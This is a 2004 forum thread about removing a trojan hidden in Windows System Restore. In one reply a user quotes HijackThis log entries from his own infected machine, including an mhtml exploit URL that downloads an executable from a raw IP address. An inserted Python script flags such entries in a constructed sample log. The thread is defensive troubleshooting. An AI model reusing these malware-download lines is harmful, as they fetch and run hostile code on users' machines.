PC Review



AVG Problem, I think

 
 
Love That Music
      1st Jul 2004
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
 
Reply With Quote
 
 
 
 
KeithS
      1st Jul 2004
Love That Music wrote:
> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande



Had a similar message on my WinME system, don't know what you're
using. I turned off my system restore, used A Squared at
http://www.emsisoft.com/en/ to get rid of the Trojan, then rebooted,
rechecked with A Squared and all now OK. Before I turned off Sys
Restore, the Trojan was just being restored every time.
HTH
KeithS
 
Reply With Quote
 
REM
      1st Jul 2004

> Love That Music <(E-Mail Removed)> wrote:


>Hate to appear stupid, but I get a pop-up message that I have a trojan
>and to run AVG to get rid of it. I've run AVG regular and in safe
>mode, with no effect. (Popup reads : G:\System Volume Information \
>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>is no problem, but I still get the popup. Does anyone have a
>suggestion to help me? Thank you, in advance.
>Earl Sande


It sounds like you have a contamination. I had one awhile back and I'm
totally at a loss as to how I got it. It hid within the System Restore
folder as yours has, so it might be a related malware. Mine had a
startup entry that redownloaded the virus. I did several complete
reinstalls and each was contaminated before I could get the critical
updates for XP. I'm guessing that the problem was a security breach in
XP that allowed it back in before I could get the patch, even though I
went straight to MS after each reinstall.

AVG didn't do anything for this. AntiVir was recommended here and it
did catch and clean, but that was only part of the solution. I had to
use HiJackThis to remove the startup entries that redownloaded the
infection and called another infected file that hides in the recycle
bin, which many scanners do not scan by default.


AntiVir Personal Edition:
http://www.free-av.com/

HiJackThis:
http://www.spywareinfo.com/~merijn/files/hijackthis.zip
http://www.spywareinfo.com/~merijn/index.html


These are the two entries I had to remove with HijackThis:
----------------------------------------------------------------------------------------------------------------------------------
O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml:file://C:NXSFT.MHT!http://66.117.38.54:80/iex/ofile.exe...0/dexUS604.exe

O16 - DPF: {11111111-1111-1111-1111-111111111123} -
file://c:\Recycled\1.exe
----------------------------------------------------------------------------------------------------------------------------------

The first is an mhtml exploit that redownloads the infection. The
second is a call to an infected file hiding in the recycle bin.

AntiVir will get the part hiding in your System Restore and on your
boot drive.

You will need to disable AVG. You don't want to run two virus
scanners. I think that after you experience AntiVir you will agree
that it is by far superior to AVG. It can clean the malwares.

I spent a whole bunch of time on this infection and I hope this will
prevent you from doing the same. If you are not patched you will need
the mhtml patch for sure to prevent further infections.

Good luck!




-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----== Over 100,000 Newsgroups - 19 Different Servers! =-----
 
Reply With Quote
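
The post above describes two HijackThis `O16 - DPF` entries, one wrapping a download in `mhtml:` and one pointing at a file in the recycle bin. The following is an added example, not part of the thread or of HijackThis itself: a small triage script that rejoins line-wrapped log entries and flags `O16` codebases with those traits. The sample log, CLSIDs, host names and the list of heuristics are constructed assumptions.

```python
import re

# Constructed sample log, not taken from the thread. 192.0.2.10 is a
# documentation-only address; CLSIDs and names are made up.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [ExampleTray] C:\Program Files\Example\tray.exe
O16 - DPF: {AAAAAAAA-0000-0000-0000-000000000001} (Example Viewer) - https://download.example.com/viewer.cab
O16 - DPF: {AAAAAAAA-0000-0000-0000-000000000002} -
mhtml:file://C:\EXAMPLE.MHT!http://192.0.2.10:80/dir/sample.exe
O16 - DPF: {AAAAAAAA-0000-0000-0000-000000000003} -
file://c:\Recycled\1.exe
"""

ENTRY_START = re.compile(r"^O\d+ - ")
O16 = re.compile(r"^O16 - DPF: (\{[0-9A-Fa-f-]+\})(?: \(.*?\))? - ?(.*)$")
HTTP_HOST = re.compile(r"https?://([^/:\\]+)")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Assumed heuristic: folders where a legitimate ActiveX codebase does not live.
ODD_DIRS = ("\\recycled\\", "\\recycler\\", "\\system volume information\\", "\\temp\\")

def join_wrapped(log):
    # Rejoin entries that a mail or news client wrapped onto a second line.
    entries = []
    for line in filter(None, map(str.strip, log.splitlines())):
        if ENTRY_START.match(line) or not entries:
            entries.append(line)
        else:
            entries[-1] += line
    return entries

def reasons_for(codebase):
    # Return the heuristic reasons a DPF codebase URL deserves a closer look.
    low = codebase.lower()
    host = HTTP_HOST.search(low)
    checks = [
        (low.startswith("mhtml:"), "mhtml: wrapper"),
        ("file://" in low, "local file reference"),
        (any(d in low for d in ODD_DIRS), "recycle bin, restore or temp path"),
        (low.endswith((".exe", ".scr")), "bare executable, not a .cab/.ocx"),
        (bool(host and IPV4.match(host.group(1))), "raw IP address as host"),
    ]
    return [why for hit, why in checks if hit]

def suspicious_o16(log):
    # Map CLSID -> reasons for each O16 entry that trips a heuristic.
    hits = {}
    for m in filter(None, map(O16.match, join_wrapped(log))):
        if why := reasons_for(m.group(2)):
            hits[m.group(1)] = why
    return hits
```

Calling `suspicious_o16(SAMPLE_LOG)` returns the second and third sample entries with their reasons and leaves the `.cab` download from a named host unflagged.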
 
Ionizer
      1st Jul 2004
"Love That Music" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande


Disable System Restore, scan for viruses, then reboot and re-enable System
Restore. How to disable and enable System Restore in Windows XP:
http://service1.symantec.com/SUPPORT...rc=sec_doc_nam

Regards,
Ian.


 
Reply With Quote
 
Doc
      1st Jul 2004
Love That Music <(E-Mail Removed)> wrote in
news:(E-Mail Removed):

> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande


any .scr (screensaver) would be a suspect for a trojan or virus, a real
common form of transmission

--
aardvark (ard'-vark) a controversial animal with a long probing nose used
for sniffing out the facts and stimulating thought and discussion.
 
Reply With Quote
 
Gordon Abbot
      2nd Jul 2004
Doc wrote:
> Love That Music <(E-Mail Removed)> wrote in
> news:(E-Mail Removed):
>
>
>>Hate to appear stupid, but I get a pop-up message that I have a trojan
>>and to run AVG to get rid of it. I've run AVG regular and in safe
>>mode, with no effect. (Popup reads : G:\System Volume Information \
>>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>>is no problem, but I still get the popup. Does anyone have a
>>suggestion to help me? Thank you, in advance.
>>Earl Sande

>
>
> any .scr (screensaver) would be a suspect for a trojan or virus, a real
> common form of transmission
>

Check your startup programs (use msconfig with win 98) and see if
A0037876.scr is there. Disable it. Many viruses put themselves in
startup. The cleaner gets rid of them elsewhere but leaves them in startup.

GA

--
My address is spoofed, so do not reply directly.
 
Reply With Quote
 
Love That Music
      2nd Jul 2004
Thanks for all the help. Day 2 and all seems to be fixed. You people
are GREAT!
Earl
 
Reply With Quote
 
REM
      2nd Jul 2004

> Love That Music <(E-Mail Removed)> wrote:


>Thanks for all the help. Day 2 and all seems to be fixed. You people
>are GREAT!
>Earl


Out of curiosity, how did you get rid of the bug?

ASquared was recommended to me, but at the time it did not detect the
infection.

What freeware tools did you use?




 
Reply With Quote
 
Love That Music
      3rd Jul 2004
>Out of curiosity, how did you get rid of the bug?
>
>ASquared was recommended to me, but at the time it did not detect the
>infection.
>
>What freeware tools did you use?


I turned off the System Restore, then used the ASquared. ASquared
didn't report finding any malware (although, let me write that I was
very impressed with the program in it showing what files were being
examined). Re-booted. Then turned on the System Restore. So Far -
Fingers crossed - there's no popup for the trojan.

Earl
 
Reply With Quote
 
Bebi
      4th Jul 2004
On Thu, 01 Jul 2004 06:01:32 GMT, Love That Music
<(E-Mail Removed)> wrote:

>Hate to appear stupid, but I get a pop-up message that I have a trojan
>and to run AVG to get rid of it. I've run AVG regular and in safe
>mode, with no effect. (Popup reads : G:\System Volume Information \
>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>is no problem, but I still get the popup. Does anyone have a
>suggestion to help me? Thank you, in advance.
>Earl Sande


I have seen this problem before. The trojan is inside your System
Restore files. AVG does not actually scan these files as default.
One way to get rid of this trojan is by doing a complete system
re-install, which isn't really the best option. Another way (and I
have only heard about this, never tried it so no comebacks please) is
to disable your System Restore program, run AVG, then once it has
found and cleansed the files, re-enable System Restore if you wish.

I would like to point out that a lot of people I have spoken to do not
actually recommend that the Windows System Restore is used, I myself
have had problems with it. There are other Restore programs available
but I have not used any.

Bebi

Quid sit futurum cras, fuge quaerere
 
Reply With Quote
 
 
 